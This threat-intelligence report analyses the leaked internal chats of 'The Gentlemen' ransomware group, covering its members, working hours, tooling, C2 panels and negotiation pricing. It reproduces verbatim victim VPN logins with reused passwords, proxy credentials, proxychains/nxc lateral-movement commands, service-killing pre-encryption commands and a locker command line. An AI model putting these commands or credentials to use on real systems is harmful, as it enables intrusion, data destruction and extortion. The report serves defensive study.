The Gentlemen Ransomware Group — Leak Analysis

Contributors: Alexandre Dulaunoy, Chaitanya H., Dani [Varys] K, Ellis Stannard, Eric Taylor, Jeffrey Bell, Katya K, Nick Smart, Olivier Ferrand, Pedro Moura, Rakesh Krishnan, Vlad G, Valéry Rieß-Marchive

Analysis tools and data are maintained in a private GitHub repository managed by the RansomLook team.

Analysis graph — Obsidian vault showing room-to-actor relationships

Executive Summary

In early May 2026, the internal communications infrastructure of The Gentlemen ransomware group was compromised and their data leaked publicly. A user operating under the handle “n345” first offered the data for sale on May 5, 2026 at a price of $10,000 USD in Bitcoin, providing a Tox ID for contact. Three days later, on May 8, the same user released the data freely on multiple forums including PwnForums and CryptBB.

The leaked archive contains 22 Rocket.Chat room exports (CSV format), hundreds of screenshots, and operational files from the group's internal communications platform hosted at xcsqtdobtmdhsjkyjz6iydfowh7bps5dd3a2xg53oirylnohednc4syd.onion. The data spans from November 2025 through late April 2026 and provides an unusually detailed view into the group's structure, tooling, victim targeting pipeline, negotiation tactics, and affiliate relationships.

The compromise traces back to an attack on hosting provider 4VPS.SU, which on May 2, 2026 disclosed that its website and client billing system had been breached. Attackers executed a proxy server swap that briefly redirected the 4VPS domain to a phishing address and planted a fake message claiming full infrastructure destruction. According to 4VPS, the main hosting infrastructure sustained no physical damage and client data remains intact, though the billing system required restoration and some servers were rendered unavailable — either through emergency network isolation or GRUB bootloader damage. The Gentlemen group has publicly confirmed that part of their own backend infrastructure was compromised as a result of this 4VPS breach, though they claim core components (control panel, blog, lockers) were unaffected.

The Russian-speaking RaaS operation emerged in July/August 2025, with its first public data leak site (DLS) post on September 9, 2025. RansomLook records now attribute more than 400 publicly claimed victims to the group. This report analyses a leaked Rocket.Chat corpus covering only November 2025 through late April 2026 — approximately 6 months of a 10+ month operation — from which 66 victims are independently confirmed across the 22 exported chat rooms. This represents roughly 16% of the known victim pool, making this report a window into a much larger operation rather than a comprehensive teardown. The group's full victim list — maintained internally and referenced in the PODBOR targeting channel — is significantly larger than what this partial leak exposes. High-profile targets include an Iraqi commercial bank, a Mauritian financial services group, a Gulf cement manufacturer, a Spanish ceramics manufacturer, and an Asian investment firm where the group claimed to have stolen 1.5 TB of data. Analysis by the Ransom-ISAC team and collaborators — including Alexandre Dulaunoy and Olivier Ferrand of RansomLook — reveals the full operational lifecycle of a significant RaaS operation with victim impact across multiple continents.

1. Leak Origin and Timeline

1.1 Pre-leak operational timeline (Nov 2025 – 4 May 2026)

The operational timeline reveals a rapid professionalization of The Gentlemen's activities from November 2025 through early May 2026. After migrating from Mattermost to a self-hosted Rocket.Chat instance on Tor in mid-November, the group quickly scaled their operations: moving from opportunistic FortiGate VPN exploitation to a structured phishing pipeline and deploying specialized C2 tooling like ZeroPulse and Velociraptor by January. High-impact live intrusions, including attacks on a major telecom provider and international shipping companies, dominate the early 2026 timeline. Concurrently, operators actively integrated AI models to assist with decryption, data analysis, and negotiation workflows. The operation maintained this high tempo until a backend infrastructure compromise forced a public acknowledgment on May 4, followed by the complete public leak of their operational archives on May 8.

timeline
    title The Gentlemen — Major Operational Milestones (Jul 2025 – May 2026)
    Jul–Aug 2025 : Group emerges
    Sep 2025 : First public DLS post (9 Sep)
    Oct 2025 : Early operations (pre-corpus)
    Nov 2025 : Rocket.Chat corpus begins
             : Mattermost → Rocket.Chat migration
             : First FortiGate targets
             : First confirmed victim (in corpus)
    Dec 2025 : HTML phishing pipeline
             : First targets delivered
    Jan 2026 : ZeroPulse C2 & Ops panel
             : Velociraptor introduced
             : Major telecom intrusion
    Feb 2026 : NAS ransomware deployments
             : AI models shared
    Mar 2026 : Target list sharing
             : Enterprise & shipping intrusions
    Apr 2026 : Uncensored AI shared (Qwen)
             : GPU rented for data analysis
    May 2026 : Infrastructure compromise confirmed
             : Data leaked publicly

PwnForums sale post — “The Gentlemen - hacked data for sale” by n345, $10K USD

CryptBB free release — “The Gentlemen - leaked data” by n345, May 8 2026

Leaked data folder structure — 22 room directories plus 8990.zip

Leak Tox ID (from sale post): 7862AE03A73AAC2994A61DF1F635347F2D1731A77CACC155594C6B681D201F7AD6817AD3AB0A

Note: This Tox ID does not match the Tox ID found in the group's own ransom note drafts (F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E), suggesting the leaker is not a current group member using the same comms channel — or is using a separate identity.

Official response post by The Gentlemen — T1erone forum, 4 May 2026

In response to the leak, The Gentlemen posted an official statement on T1erone on May 4, 2026 — notably one day before the data was offered for sale publicly by “n345” on May 5. This timing suggests they either had advance warning/intelligence on the leaker, or the leaker contacted them prior to going public.

The group confirmed the Rocket.Chat compromise, attributing it to the hacking of their hosting provider 4VPS, stating that 4VPS “brazenly lied that everything was fine.” They acknowledged the leaked Rocket password is genuine but claimed the attacker never gained access to the control panel, blog, lockers, or other critical components. Dismissing the breach with the Russian proverb “the dogs bark, but the caravan moves on,” they immediately pivoted to announcing operational upgrades: a new communications structure, new NAS infrastructure “available on Victory Day,” and locker improvements including hardware breakpoint removal, NTDLL unhooking, and ETW patching. The group characterized the leak as “indeed very partial — which is actually sad,” framing it as a disappointment rather than a threat. The response read less like damage control and more like a press release — business as usual for a group that sees itself as a professional operation.

Key statements from The Gentlemen's response:

• Confirmed “part of Rocket was compromised” and the leaked password is correct
• Claimed “no access to the control panel, blog, lockers, or other critical components”
• Blamed 4VPS: “they brazenly lied that everything was fine, and nothing happened”
• Stated the attacker “spent a month attempting to extract data from NASA through an onion blog” and they mistook the requests for automated bots
• Announced operational continuity: new communications structure, new NAS “available on Victory Day” (May 9)
• Listed locker improvements: hardware breakpoint removal from DR registers, NTDLL unhooking with clean syscall stubs, ETW patching
• Claimed: “A locker has been successfully running under active EDR from a well-known vendor”
• Dismissed the situation: “the dogs bark, but the caravan moves on”

Pre-leak internal security concerns (insider threat + blackmail): The corpus also contains earlier messages implying (1) prior internal compromise events and (2) a separate extortion/blackmail episode before the May 2026 public leak.

2026-02-02 — zeta88:
“Если крысы опять будут на борту - сменим тор - и всё)
удалим крысу. бд останется”
Translation: “If the rats are on board again — we change Tor and that's it. Delete the rat. The DB stays.”
Note: “Опять” (“again”) implies an earlier insider incident prior to May 2026.

2026-02-28 — zeta88:
“была атака на нас, и был атакован атакующий (блекмейл)
и была удалена статья в ресерчерском издании”
Translation: “There was an attack on us, and the attacker was attacked [blackmailed], and a researcher article was deleted.”
Note: zeta88 indicates a pre-leak incident involving mutual blackmail and the apparent removal of a research publication.

2. Group Structure and Affiliates

2.1 Corpus coverage and room distribution

Total sample: 3,366 unique messages across 22 rooms (by message ID).

• 3,093 with text content
• 273 image-only (attachment only, no text)

Rocket.Chat room volume distribution — 3,366 unique messages across 22 rooms (by message ID)

Smallest rooms: 791070, 217109, 945300, 462726 each have 3–5 messages — primarily credential drops with little/no conversation.

2.2 Core Members

The corpus contains 9 distinct Rocket.Chat usernames across the 22 exported rooms. Message volume and room presence indicate a clear hierarchy.

Message volume by core member (pie chart)

Team dynamics and revenue framing (selected quotes)

Internal chat excerpt — team dynamics and revenue-based target framing

The leak includes direct evidence of revenue-based target framing and suggests at least one affiliate (Kunder) has a subordinate operator team.

Revenue context — Turkish home-appliance manufacturer (April 2026):

2026-04-12 — zeta88:
“я щас опять ебу по дате лярдник. 12 лярдов. бытовая техника. бренд ты знаешь”
Translation: “I'm chasing a deadline again. 12 billion. Home appliances. You know the brand.”
Note: “лярдник” = billion-ruble target. 12B RUB ≈ ~$130M USD. A separate “9 лярдов” target is mentioned on Apr 15.

Kunder appears to manage a sub-team (February 2026):

2026-02-07 — Kunder:
“мои там все грезят доступами, что-то дорабатывают) уже боты были, но пивотинга нет, только цмд, от юзера”
Translation: “My people are dreaming of accesses, working on improvements. Already had bots but no pivoting, only cmd, user-level.”
Note: Implies Kunder has operators working under them (tooling/bot development) beneath zeta88's overall leadership.

2.3 Communications Platform Timeline

The leaked data is entirely from the group's self-hosted Rocket.Chat instance on Tor (xcsqtdobtmdhsjkyjz6iydfowh7bps5dd3a2xg53oirylnohednc4syd.onion), used November 2025 through April 2026. They migrated there from Mattermost in mid-November 2025. Matrix references visible in some screenshots (matrix.bestflowers247.online, timestamped 2023) are old bilateral comms shared as image attachments inside Rocket.Chat for reference — not a concurrent platform.

2.4 Communication Language and Working Hours

All internal communications are in Russian. The group uses ZoomInfo for victim revenue research, Reverso.net for English translation (visible in browser tabs and screenshots), and AI assistants (explicitly referenced: “Гпт. клауде — мы играем в переговорщика” — “GPT. Claude — we're playing negotiator. It will help you”).

2.5 Rocket.Chat User ID Mapping

Rocket.Chat constructs DM room IDs as the alphabetical concatenation of two 17-character user IDs. Analysis of 9 distinct DM room IDs yields 8 unique user IDs, with the following confirmed mappings:

• gZ8Fsa7xdDghbFHDK → zeta88 (present in 6 of 9 DM IDs; consistent with highest room presence)
• WF4u5fzhWChuxBRZ2 → qbit (paired exclusively with zeta88 in room 302930, which contains only these two participants)

Note: The DM ID 3rKqsqFP7JfjBhe9igZ8Fsa7xdDghbFHDK superficially resembles a Bitcoin P2SH address, but all 7 corpus occurrences are Rocket.Chat /direct/<id> URLs — it is a room ID, not a wallet.

2.6 Room Structure

The exported rooms represent DM pairs and small group discussions. Notably, several operational channels referenced in chat messages were NOT included in the export:

Missing channels (referenced but not dumped):

• /channel/PODBOR (target selection — 10 references)
• /channel/INFO (knowledge base)
• /channel/general
• /channel/TOOLS
• /group/PHISHING (21 references from room 505812 alone)
• 10 additional groups related to specific victims

This means the leak is partial — the actual operational data is significantly larger than what was exported.

Coverage context: The group has been active since at least July/August 2025 (first DLS post: September 9, 2025) and RansomLook attributes 400+ publicly claimed victims to the operation. The 22 exported rooms and 66 confirmed victims from this corpus represent approximately 16% of the known victim pool, covering only ~6 months of a 10+ month operation. All quantitative findings in this report should be treated as lower bounds.

2.7 Temporal Analysis

The group operates on a roughly 11-hour core window from UTC 10:00 through UTC 21:00, with peak traffic at UTC 17:00 (512 messages). A secondary spike at UTC 00:00–01:00 (370 messages combined) is driven primarily by quant and zeta88. The sustained trough runs from UTC 02:00 to 09:00, functioning as the group's collective downtime. There is no meaningful weekend reduction in activity — Sunday is the busiest day (668 messages) and Friday the quietest (372), suggesting the group doesn't operate on a conventional work-week rhythm.

Monthly volume shows a sharp ramp from low-level activity in November–December 2025 (38 and 31 messages respectively) to a January 2026 surge of 1,176 messages. Volume dips in February (754), recovers in March (1,096), then tapers again in April (638). The January spike likely marks an operational inflection point — either new members joining, a campaign launch, or both.

Of the seven operators, four share a broadly similar active window clustered around the UTC 10–21 band: zeta88 (peak UTC 17, active 10–01), Protagor (peak UTC 17, active 06–22), Wick (peak UTC 18, active 11–22), and Kunder (peak UTC 17, active 09–21). mAst3r fits a similar but slightly shifted profile (peak UTC 16–18, active 06–21). The two outliers are quant, whose activity concentrates in UTC 00–11 with a peak at UTC 00 and near-total silence after UTC 12, and qbit, who shows a bimodal pattern — two distinct sessions split by a UTC 05–08 gap.

2.7.1 Assessment

The top five operators (zeta88 through mAst3r) share a remarkably consistent shape — activity concentrated in the UTC 10–21 band, peaking between UTC 16–18, with near-silence in the early UTC hours. That clustering suggests they're coordinating around a shared operational window, whether because they're in similar timezones or because the group's workflow demands overlapping availability.

Quant is the clearest outlier. Activity is essentially inverted — peaking at UTC 00–01 and tapering off by UTC 11–12, with a near-total blackout from UTC 12 through 23. That's not a night-owl variant of the core pattern; it's a fundamentally different daily cycle. Whatever is driving it — timezone, work schedule, personal preference — quant is operating on a clock that has almost zero overlap with the group's peak hours. Quant's contribution to the UTC 00–01 secondary spike is what makes it visible at all.

Qbit shows a different kind of anomaly: two distinct sessions separated by a hard zero-message gap at UTC 05–08. The first session (UTC 00–04) overlaps with quant's active window. The second (UTC 09–18) overlaps with the core group. That bimodal split is structurally unusual — most people show a single continuous active block with gradual tails. Two cleanly separated sessions suggest either a split schedule, a timezone where those windows map to morning and evening, or a deliberate operational choice to be present during both the core group's hours and quant's hours.

Quant's active window of UTC 00–11 maps cleanly to a standard waking/working day somewhere in the UTC+5 to UTC+9 range. At UTC+7 that's 07:00–18:00 local, at UTC+8 it's 08:00–19:00, at UTC+6 it's 06:00–17:00. The sharp start at UTC 00 and clean cutoff around UTC 11–12 look like someone logging on in the morning and signing off at end of day. The pattern is too regular and too concentrated to be a night owl in a European timezone — a person choosing to work overnight would typically show more drift and less consistency. The data points toward Central, South, or Southeast Asia.

Qbit is harder to pin down because of the bimodal pattern. If you assume a single timezone, UTC+8 produces the neatest fit: session one (UTC 00–04) becomes 08:00–12:00 local, the gap (UTC 05–08) becomes a midday break at 13:00–16:00, and session two (UTC 09–18) becomes 17:00–02:00 local — a morning work block followed by an evening session. UTC+7 works almost as well. The alternative is that qbit is in a European timezone and deliberately maintaining two sessions to bridge the core group's hours and quant's hours, but that's a more complex explanation for the same data.

2.7.2 Timezone Assessment Table:

3. Operations and TTPs

3.1 Attack Chain Overview

The leaked communications reveal a consistent attack chain:

TTPs / tooling — explicit mentions

The table below summarizes selected tools explicitly named in the 22 exported room CSVs. Counts include Russian-language mentions (e.g. форти, рдп) alongside English tool names and may vary with additional parsing or OCR of screenshots.

TTPs / tooling — explicit CSV mentions incl. Russian-language variants (pie chart — updated counts)

1. Target Selection (PODBOR channel)
Targets are identified through Fortinet device scanning. Listings are posted in a structured format containing IP, port, FortiGate model, firmware version, hostname, and country. Victims are then researched on ZoomInfo for revenue and sector. Example target intake format from zeta88:

2022 SingaporeSingapore 119.73.149.194:443 [REDACTED] https://www.zoominfo.com/c/[REDACTED]/ Сектор - софт. Ревеню - 5кк

2. Initial Access via Fortinet VPN
The string openconnect --protocol=fortinet appears in 10 messages across the corpus. VPN passwords used by the group follow a naming convention: gentlemen25, Gentlemen25, gentle26.

Verbatim examples:

• openconnect --protocol=fortinet --no-dtls -u root 14.99.248.6:10443 / password: gentlemen25
• openconnect --protocol=fortinet --no-dtls -u root 102.212.53.2:10443 / password: gentle26

FortiGate configuration dumps containing plaintext local user passwords and LDAP bind credentials are shared in full between affiliates.

3. Internal Reconnaissance

• NetExec (nxc) for SMB enumeration — 32 occurrences in CSV corpus (nxc: 30, netexec: 2)

SMB Enumeration using nxc

• Custom scanner (“gogo”) for web service discovery
• Shodan and Censys for external asset discovery
• Snusbase for credential lookup against victim domains

Snusbase for credential lookup against victim domains

• api.c99.nl — subdomain enumeration API used for footprinting victim public infrastructure (observed in operator screenshot showing the C99.NL CLI tool with ping results and JSON-formatted response data)

4. Credential Harvesting and Lateral Movement

• Password spraying against domain controllers
• LDAP enumeration using extracted FortiGate bind credentials
• NTLM relay attacks (ntlmrelayx, Responder)
• Credential dumping (KslKatz, KslDump, patched Mimikatz for Windows 11 24H2/25H2)
• Browser secret extraction (DumpBrowserSecrets)
• Stealer log processing (zeta88 claims “3 TB of ULP and a scraper for them”)

5. Persistence and C2

• G-BOT Control Panel — custom C2 with web UI, beacon management, SOCKS5 proxy integration, and a builder that uploads payloads to temp.sh/0x0.st
• Velociraptor — the legitimate DFIR tool repurposed as C2, with multi-org configurations and MSI package building
• ZeroPulse — referenced C2 framework (github.com/jxroot/ZeroPulse)

6. Data Exfiltration

• rclone, RcloneView, WinSCP for cloud/remote transfers
• Various cloud mount tools evaluated (RaiDrive, NetDrive, AirLiveDrive, MountainDuck, CyberDuck)
• Limewire used for internal file sharing between affiliates

• Unknown aaa.exe file consistent with a file-scanning/exfiltration utility: --max-age 5y (files up to 5 years old), --max-size 100 (likely MB), --min-size 1 (skip tiny files), --bwlimit 3M (bandwidth throttling to avoid detection), --scan-rate 200, and --transfers 8 (parallel transfers). It's targeting the entire C:\ drive.

aaa.exe - possible exfiltration tool

7. Pre-Encryption Actions
Pre-encryption scripts observed in the corpus:

docker stop $(docker ps -q)
pkill -9 qemu
sudo pkill -9 -f "qemu-system"
sudo systemctl stop $(systemctl list-units --type=service | grep -iE 'mysql|maria...')

8. Encryption

• Linux/NAS locker binary: /opt/updateamd with flags --password W8wNZteb --path "/volume1/DATA/HQ Common Share" --ultrafast --keep
• Encrypted file extension: .i8p14s
• Ransom note filename: README-GENTLEMEN.txt (also README-GENTLEMEN without extension)

Encryption process from payload locker - linux variant.

9. Negotiation
Negotiations conducted via qTox. Initial pricing tiers (per operator messaging):

• Decryption: $65–80K
• Data removal (blog, server, social media): $95–120K
• Security report: $25K
• Opening “all options” package: $100–225K

Note: Actual negotiated demands diverge from these opening tiers — the full negotiation transcript in Section 7 shows the final demand stabilising at $190K after multiple rounds. Treat the figures above as the group's formulaic starting position, not as fixed pricing.

3.2 FOBOS Loader — Initial Access Toolkit

A Windows Explorer screenshot reveals the TOOLS/FOBOS/ folder hierarchy, which is the group's initial access and payload delivery platform.

Top-level contents:

• FOBOSLOADER — the primary loader
• CAMPAIGNS+ — campaign management
• MAIL BASES, MAILS, MAIL, APACH, DOMAIN — email infrastructure
• Phemedrone Stealer V2.3.2 — info stealer
• AntiPublic — credential checking tool
• XENO — additional tooling

Delivery methods (NEWWAYS/ subfolder):

• HTMLSMUG — HTML smuggling
• CLEARFIX — ClickFix social engineering variant
• pdfdropper-main, PDF+DOC — document-based delivery
• msi-dropper — MSI package delivery
• NEW LNK, EXTRA NEW LNK — LNK-based delivery
• polyglotter — polyglot file creation
• SMTPSMUG — SMTP smuggling
• URIURL — URI/URL handler abuse
• waterhydra URL IN ZIP — CVE-2024-21412 exploitation
• SELFDELETE — self-deleting payloads
• PYDROPPER — Python-based dropper
• BobTheSmuggler-main.zip — HTML smuggling tool
• file-archiver-in-the-browser-main — browser-based file archive lure
• BITMBMITB — browser-in-the-browser attack framework

FOBOS NEWWAYS folder — full delivery method arsenal (timestamps May 2023 – April 2025)

Additional tooling observed in NEWWAYS/ (from screenshot):

• electron selenium chrome — likely a Selenium-driven Chromium/Electron automation bundle (consistent with traffic/interaction automation, testing, or mass-account workflows)
• grim — ambiguous naming; may be a local build/alias for a dropper or lure generator (needs confirmation from files)
• 12.SettingContent-ms — Windows SettingContent-ms handler/lure content (commonly used to trigger settings/URI handler flows)
• !!!!!!!!!!!!smugglo-main.zip — zip-named smuggling-related tool (likely a renamed “Smuggler/Smuggle” project archive; needs confirmation from files)

3.3 Tooling Arsenal

All GitHub repositories referenced in the leaked chats (extracted by Olivier Ferrand via grep github *csv -r | cut -f4 -d, | sort | uniq):

GitHub tool references extracted from the corpus by Olivier Ferrand

Interpreting GitHub link sharing (role signal)

Based on collaborator review of the GitHub links, zeta88 and qbit account for the large majority of unique tool references. The split in what they share aligns with an “operator chain builder” vs “access/infrastructure” division of labor:

• zeta88: operator-focused tooling (credential dumping, EDR disruption, LPE, C2 frameworks, lateral movement, and cloud/Azure exploitation).
• qbit: access and infrastructure enablement (VPN setup, tunneling/proxying, AD recon, NTLM relay/coercion tooling, forensic cleanup, and exploit PoCs).

Other participants appear to contribute comparatively few repositories (e.g., Wick, JeLLy), consistent with a narrower execution-focused role in the portions of the leak that were exported. Separately, collaborator notes indicate mAst3r and Wick shared “backup/tutorial” style material (e.g., myphp content), which may reflect tasking around post-access operations rather than tool-sourcing.

Credential Extraction:

• Maldev-Academy/DumpBrowserSecrets — browser credential dumping
• andreisss/KslDump — credential dumping
• S1lkys/KslKatz — Kerberos ticket extraction
• tanrikuluatahan/mimikatz — patched Mimikatz for Windows 11 24H2/25H2
• toneillcodes/dpapi-projects — DPAPI credential extraction
• xaitax/Chrome-App-Bound-Encryption-Decryption — Chrome cookie decryption

EDR Evasion:

• TwoSevenOneT/EDRStartupHinder — EDR startup process blocker
• Nightmare-Eclipse/RedSun — evasion framework

CrowdStrike: The corpus also includes a note that a CrowdStrike-focused “killer” exists, but is priced as premium tooling:

▎ mAst3r (2026-01-21 16:27): “на крауд тоже есть, просто стоит где то 5000$” = “there's one for Crowd too, it just costs about $5,000”

▎ Wick (2026-01-21 16:19): “остался только крауд из топов” = “only CrowdStrike left from the top EDRs”

Lateral Movement and AD Exploitation:

• trustedsec/Titanis — AD exploitation
• mdsecactivebreach/RegPwn — registry-based privilege escalation
• blacklanternsecurity/MANSPIDER — file search across SMB shares
• depthsecurity/RelayKing-Depth — NTLM relay
• 0x0Trace/Certihound — AD CS exploitation (ESC1–ESC17)
• Pennyw0rth/NetExec (pull 1054) — CertiHound integration
• dazzyddos/PrivHound — privilege path discovery
• S1lkys/AudioDG.exe-DLL-Hijacking-for-LPE — local privilege escalation
• hausec/PowerZure — Azure exploitation
• wh0amitz/TailVNC — VNC-based access

C2 and Tunneling:

• jxroot/ZeroPulse — C2 framework
• 1r0BIT/TaskHound — task management for implants
• nullsection/chisel-ng — SOCKS tunneling
• shunf4/proxychains-windows — Windows proxy chaining
• pizdatiigus/Double-VPN-with-OpenVPN — double VPN setup
• Velocidex/velociraptor v0.76 — repurposed DFIR tool as C2
• evilsocket/nyx — post-exploitation

Vulnerability Exploitation:

• platsecurity/CVE-2025-32433 — Erlang SSH RCE
• bombadil-systems/zombie-zip — archive-based exploitation

Infrastructure:

• angristan/wireguard-install — WireGuard VPN setup
• angristan/openvpn-install — OpenVPN setup

3.4 CVEs Referenced

3.5 G-BOT Control Panel — Custom C2

The G-BOT Control Panel is a previously undocumented custom C2 framework observed in multiple screenshots. Key features:

• Web-based UI with beacon management (online/offline status, OS detection, privilege level)
• Per-beacon actions: Execute, SOCKS proxy, Kill, Delete
• Built-in SOCKS5 proxy configuration with usage examples for proxychains, cURL, and SSH
• Builder UI with options to upload payloads to temp.sh/0x0.st and save Tox/Session IDs for future builds

• PID file: /var/run/gbot_root.pid
• Supports both Linux and Windows beacons

G-BOT C2 framework — operator desktop screenshot

Usage of G‑BOT (as observed in screenshots)

G‑BOT appears to be used as an interactive post-exploitation C2/pivot platform:

• Beacon management: operators can search beacons by hostname/domain/IP/username and track status (Online/Offline).
• Live command execution: examples shown include running cat /var/run/gbot_root.pid on a Linux beacon and whoami on a Windows beacon.
• Privilege/context display: the UI shows the effective privilege level (e.g., ROOT on Linux, ADMINISTRATOR on Windows), which likely informs tasking (dump creds, deploy tools, stage encryption, etc.).
• SOCKS pivoting: each beacon advertises a SOCKS port (e.g., 30001, 30002), consistent with using compromised hosts as traffic relays for internal discovery/lateral movement.
• Operator actions: per-beacon buttons (Execute, SOCKS, Kill, Delete) suggest the ability to run commands, enable/attach to a proxy tunnel, terminate implants, and remove entries/artifacts.

Observed beacons in screenshots:

• Linux: debian / unknown@debian / ROOT / SOCKS: 30001
• Windows: WIN-RU3I93PPUD7 / Administrator@WORKGROUP / ADMINISTRATOR / SOCKS: 30002

G-BOT beacon management UI — per-beacon Execute, SOCKS, Kill, and Delete actions

3.5.1 SOCKS5 Proxy Infrastructure — Operator Pivoting Layer

SOCKS5 proxying is a core component of The Gentlemen's operational infrastructure, used at multiple layers: as a built-in feature of the G-BOT C2 (per-beacon SOCKS ports), as standalone proxy credentials shared between operators, and via SSH dynamic port forwarding. The group chains these proxies through proxychains to route lateral-movement tools (primarily nxc) through compromised hosts or external proxy services.

G-BOT integrated SOCKS: Each G-BOT beacon automatically advertises a SOCKS port (e.g., 30001, 30002), enabling operators to pivot through compromised hosts for internal network discovery and lateral movement without exposing their origin IP.

External SOCKS5 proxy credentials (verbatim from room 302930):

2026-03-18 — qbit:
socks5://a53a47b57b8ba462:[email protected]:36067

2026-03-18 — zeta88 (proxychains.conf format):
socks5 91.245.35.22 36067 a53a47b57b8ba462 c791621140ee88f93acd4fb3538b3z55

Operational usage pattern: Operators configure proxychains to route nxc SMB scans through SOCKS proxies, enabling internal network enumeration from outside the victim VPN tunnel:

proxychains -q nxc smb IP.IP.IP.IP/24

proxychains nxc smb 10.0.1.0/24 → domain controllers discovered

SSH dynamic forwarding is also used as a lightweight SOCKS alternative:

ssh -NfD 1080 user@ip → opens SOCKS proxy on 127.0.0.1:1080, added to proxychains

ssh -J user@pivot1 user@pivot2 → multi-hop pivoting

Tooling: chisel-ng (SOCKS tunneling), proxychains-windows (Windows proxy chaining), and Double-VPN-with-OpenVPN are all referenced in the corpus as infrastructure enablement tools, primarily shared by qbit.

Tor-based proxy service: The .onion address nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad.onion (“nsocks” naming) appears in the corpus and likely represents a SOCKS proxy provisioning or resale service used by operators.

SOCKS5 proxy configuration — proxychains and tunnel setup for operator pivoting

Detection relevance: SOCKS proxy traffic from internal hosts to external IPs on non-standard ports (e.g., 36067) — particularly when correlated with SMB enumeration or AD reconnaissance — is a strong indicator of proxy-chained lateral movement consistent with this group's TTPs.

This is an internal guide written for Gentlemen operators explaining how to use SOCKS5 tunnelling after gaining access to a victim network. It functions as an internal training document.

The guide explains that once a SOCKS5 tunnel is set up on a server inside the victim's network, the operator gets full access as if they were physically inside. It then lists what's accessible through the tunnel: Jira and Confluence via internal IP, web interfaces of internal services (routers, NAS, management panels), and internal computers via RDP/SMB scanning. It notes limitations — SOCKS5 over SSH doesn't support UDP, only TCP, and warns about DNS leaks when using a browser proxy, recommending disabling “Proxy DNS when using SOCKS v5” in Firefox. It also notes that Windows machines require access through pass-the-hash or scanners rather than direct tunnel access, and RDP/SMB needs separate credentials.

The practical setup section at the bottom shows the configuration: SOCKS host 127.0.0.1, port 1080, with proxy DNS disabled.

For the report: this is evidence the group maintains internal operational documentation and trains members on post-exploitation lateral movement techniques, reinforcing the picture of a structured organisation with onboarding procedures rather than ad hoc actors.

So what?

SOCKS5 proxying is the operational backbone of The Gentlemen's post-access workflow — not an optional technique but the default routing layer through which all lateral movement, internal reconnaissance, and pre-encryption staging flows. The implication for defenders is straightforward: outbound SOCKS traffic from an internal host to a non-standard port, correlated with SMB enumeration, is not an early warning indicator — it means the intrusion is already in its exploitation phase. The recovered internal training guide confirms this is a standardized, taught methodology within the group, meaning the pattern will persist across future operations and likely across adjacent groups inheriting the same playbooks.

3.5.2 Velociraptor — Repurposed DFIR Tool as C2

The legitimate Velociraptor DFIR platform (v0.76) was repurposed by the group as a C2 framework with multi-org configurations and MSI client packaging. The following screenshots from the leaked corpus show the Velociraptor admin panel actively in use by operators:

Velociraptor admin panel — multi-org C2 configuration and MSI client builder for victim deployment

3.5.3 - Backup Management

In a ransomware operation, access to a storage array management CLI like this is very concerning. An attacker with this level of access could:

Destroy backups and recovery options — commands like delete volume, delete snap-pool, delete snapshots, clear cache would let them wipe out backup volumes and snapshots before deploying the ransomware payload. This is a standard ransomware playbook move: eliminate recovery options so the victim has no choice but to pay.

3.6 Malware Scan Evasion

A multi-engine scan screenshot shows the file SetupGps2.exe (5,650,552 bytes) detected by only 1 of 9 engines:

Hashes:

• MD5: bdfae4ff271414df8db7bfd255cf603e
• SHA-1: fe06486c3f74b317d7ec5cc9be8915c34a07a68f
• SHA-256: 91017846dd71fbbfcd40f116aca8d4c66f51583cb26fa9a54de0e1f08c9cd40f

3.7 Most Important OpSec Observations (as observed in the leak)

3.7.1 Password Reuse Across Victims

Group-branded VPN passwords recur across unrelated targets (gentlemen25, Gentlemen25, gentle26). One disclosure potentially risks multiple intrusions.

Verbatim quotes (selected):

2026-03-09 17:18:15 — zeta88:
183.178.108.244:443 root gentle26
gentle26
gentlemen25
Gentlemen25
Note: Credential drop showing reuse of group-branded passwords across targets.

2026-02-02 13:17:59 — zeta88:
“root gentle26 от нее будет”
Translation: “root gentle26 — that'll be from her.”
Note: Confirms branded VPN password assignment to a new target.

3.7.2 Additional OpSec Failures

Several lower-tier findings share a common theme of weak operational separation. Operators procure high-end infrastructure hardware (X99 dual-Xeon systems, ASUS WRX80E-SAGE boards, Threadripper Pro 3975WX processors) from Russian consumer marketplaces in the same browsing sessions used for intrusion operations, increasing real-world traceability. Personal browsing (Wildberries.ru, YouTube, SoundCloud) and competitor OSINT monitoring (e.g., tweets about Black Basta leadership) also appear on operational machines. The group's Rocket.Chat comms platform, hosted on the same Tor infrastructure, leaked channel references, DM room IDs, and full message history — producing the consolidated operational record analysed in this report.

Operator hardware procurement — workstation-class components sourced from Russian consumer marketplaces

3.7.3 LimeWire as Staging and Payload Hosting

Staging URLs on LimeWire were used to host tooling (including credential-harvesting components and “FULL G-EDR”).

Verbatim quotes (selected):

2026-01-11 18:58:39 — zeta88:
“https://limewire.com/d/XgGcm#Ln9Ijzsyim xen от @JeLLy сразу с external dll (если супер новая лиса то ставим другие external выше)”
Translation: “XenAllPasswords from @JeLLy with external dll — if very new Firefox install different externals.”
Note: Staging link for credential-harvesting tool with Firefox version-specific DLL instructions.

2026-02-20 04:25:02 — zeta88:
“https://limewire.com/d/BLcyA#fuUtpUJWK9 FULL G-EDR”

3.7.4 Rankings

A screenshot captured within the leaked data itself shows a public ransomware statistics page listing The Gentlemen as the second most active group in 2026 (behind Qilin, ahead of Clop), with approximately 130 victims attributed to the group and 1,410 total victims tracked across 322 groups at the time of that snapshot. This is a point-in-time capture from an operator's desktop — not the current total, which now exceeds 400 per RansomLook. The screenshot is notable because it demonstrates that the group actively monitors its own ranking relative to competitors, indicating deliberate competitive benchmarking within the RaaS ecosystem.

Ransomware group ranking page — The Gentlemen listed as #2 in 2026 with ~130 victims, observed on operator desktop

3.7.5 Leak-Site Pressure as Secondary Extortion

Screenshot of ransomware leak site with proof of life from a victim in the healthcare sector

The group appears to leverage this as a secondary pressure tactic during stalled negotiations:

Leak notification as negotiation leverage — operator monitoring during stalled negotiations

3.7.6 Forum Activity from Ops Desktop

Darknet forum browsing (e.g., RAMP/DragonForce and exploit forums) appears alongside operational activity; a forum handle “Mr.Bang” is visible in artifacts.

Verbatim quotes (selected):

2026-04-21 19:02:15 — zeta88:
“Gunra - че эт ваще такое... Hyflock туда же. этот мудень мне писал)) ShadowByt3$ RAAS - хз / Anubis - % видел он? / CHAOS - возьмут ли они его еще. / The Gentlemen's / Dragon Force / вот и весь выбор”
